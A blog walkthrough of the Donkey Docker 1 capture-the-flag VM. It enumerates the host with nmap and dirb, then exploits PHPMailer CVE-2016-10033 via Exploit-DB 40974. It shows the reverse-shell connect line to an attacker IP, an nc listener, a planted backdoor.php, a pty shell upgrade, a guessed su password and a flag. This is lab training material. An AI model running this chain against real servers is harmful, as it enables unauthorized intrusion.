Thursday, June 28, 2018

The Donkey Docker 1, Capture The Flag (CTF) | By Hud Seidu Daannaa

Welcome to
  ___           _            ___          _
 |   \ ___ _ _ | |_____ _  _|   \ ___  __| |_____ _ _
 | |) / _ \ ' \| / / -_) || | |) / _ \/ _| / / -_) '_|
 |___/\___/_||_|_\_\___|\_, |___/\___/\__|_\_\___|_|
                        |__/
                             Made with <3 v.1.0 - 2017
This is my first boot2root - CTF VM. I hope you enjoy it. if you run into any issue you can find me on Twitter: @dhn_ or feel free to write me a mail to:
  • Email: dhn@zer0-day.pw
  • GPG key: 0x2641123C
  • GPG fingerprint: 4E3444A11BB780F84B58E8ABA8DD99472641123C
Level: I think the level of this boot2root challenge is hard or intermediate.
Try harder!: If you are confused or frustrated don't forget that enumeration is the key!
Thanks: Special thanks to @1nternaut for the awesome CTF VM name!
Feedback: This is my first boot2root - CTF VM, please give me feedback on how to improve!
Tested: This VM was tested with:
  • VMware Workstation 12 Pro
  • VMware Workstation 12 Player
  • VMware vSphere Hypervisor (ESXi) 6.5
Networking: DHCP service: Enabled
IP address: Automatically assign

SHA-1:

77439cb457a03d554bec78303dc42e5d3074ff85  DonkeyDocker-disk1.vmdk
d3193cca484f7f1b36c20116f49e9025bf60889c  DonkeyDocker.mf
7013d6a7c151332c99c0e96d34b812e0e7ce3d57  DonkeyDocker.ovf

Walkthrough
The Donkey Docker 1 

 ________________________________________________________________

 Host Discovery
________________________________________________________________

 netdiscover 192.168.100.0/24
[+] Target IP address: 192.168.100.15

Service Enumeration
nmap -T4 -A  192.168.100.15
   PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
    | ssh-hostkey:
    |   2048 9c:38:ce:11:9c:b2:7a:48:58:c9:76:d5:b8:bd:bd:57 (RSA)
    |_  256 d7:5e:f2:17:bd:18:1b:9c:8c:ab:11:09:e8:a0:00:c2 (ECDSA)
    80/tcp open  http    Apache httpd 2.4.10 ((Debian))
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    | http-robots.txt: 3 disallowed entries
    |_/contact.php /index.php /about.php
    |_http-server-header: Apache/2.4.10 (Debian)
    |_http-title: Docker Donkey

[+] From the above action with nmap. we found some disallowed entries, courtesy of robots.txt:

/contact.php
/index.php
/about.php
________________________________________________________________

 Bruteforcing files and directories to enumerate further
________________________________________________________________

 dirb http://192.168.100.15/
about
/contact                                  A contact form
/index
/robots.txt
/mailer/LICENSE                 GNU GPL text
/mailer/examples/index.html PHPMailer code examples
________________________________________________________________

 Time to pinpoint the exploit
________________________________________________________________

[+] Judging from the comments section, we see PHPMailer code examples
[+] allow me to make a referral to my script, where i automated searchsploit, which is available on 
[+] Github:
https://github.com/huddryl/HudsPenetrationTestAutomationTweakScript_-HPTATS-

[+] The given result is:

PHPMailer  5.2.18 - Remote Code Execution (Python) with the location:
php/webapps/40974.py

[+] This is also available at the exploit DB database:
https://www.exploit-db.com/exploits/40974/
[+] Find below the description and usage of the exploit and how to use it:
..............................................................................................................................................................................
..............................................................................................................................................................................
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033

Description:
Exploiting PHPMail with back connection (reverse shell) from the target

Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py

Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
..............................................................................................................................................................................
..............................................................................................................................................................................

________________________________________________________________

Configuring & Launching the exploit
________________________________________________________________
[+] Setting the parameters for the exploit:
[+] from exploit code, the default setting is:

 target = 'http://localhost:8080'
backdoor = '/backdoor.php'

[+] Hence, from the above setting, we input our own values: 
[+] target http://192.168.100.15/contact
[+] Changes should also be made to Configure attacker IP  and port for reverse shell on payload 
[+] variable:
s.connect((\\\'192.168.100.12\\\',4444))

[+] Open NC listener in one terminal: $ nc -lnvp <your ip>
[+] Since we are running  NC from my PC (Attacker), there is no need to specify my IP, but need to
[+] specify the port to listen on:

 nc -lvp 4444

[+] After setting the required parameters, we now run the exploit

python 40974.py 

 ________________________________________________________________

Access

________________________________________________________________

[+] From the previous setting, the exploit creates a backdoor.php file on the victim machine, taking into consideration the target and the backdoor, we activate by:

192.168.100.15/backdoor.php

[+] With our eyes on the listener terminal, we attain a  shell after activation, by running
(for an extended shell):

 python -c 'import pty; pty.spawn("/bin/bash")'
[+] running the command: ls  -al 

[+] And going through the files and directories, we encountered a bash script by name: main.sh

[+] Taking a look at it with the cat command: cat /main.sh

    #!/bin/bash

     # change permission
    chown smith:users /home/smith/flag.txt

     # Start apache
    source /etc/apache2/envvars
    a2enmod rewrite
    apachectl -f /etc/apache2/apache2.conf

     sleep 3
    tail -f /var/log/apache2/*&

     # Start our fake SMTP server
    python -m smtpd -n -c DebuggingServer localhost:25


[+] From the above sighting, we can switch user to smith, since he holds permissions and also tried password as smith: ( -rwxr-xr-x)

su smith

[+] we run the id command: id
 
uid=1000(smith) gid=100(users) groups=100(users)

[+] we proceed to view /home/smith/flag.txt

cat /home/smith/flag.txt

 This is not the end, sorry dude. Look deeper!
I know nobody created a user into a docker
container but who cares? ;-)

 But good work!
Here a flag for you: flag0{9fe3ed7d67635868567e290c6a490f8e}

 PS: I like 1984 written by George ORWELL
inside .ssh there is a key

-

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

The Donkey Docker 1, Capture The Flag (CTF) | By Hud Seidu Daannaa

Welcome to ___ _ ___ _ | \ ___ _ _ | |_____ _ _| \ ___ __| |_____ _ _ | |) / _ \ ' \| / / -_) ...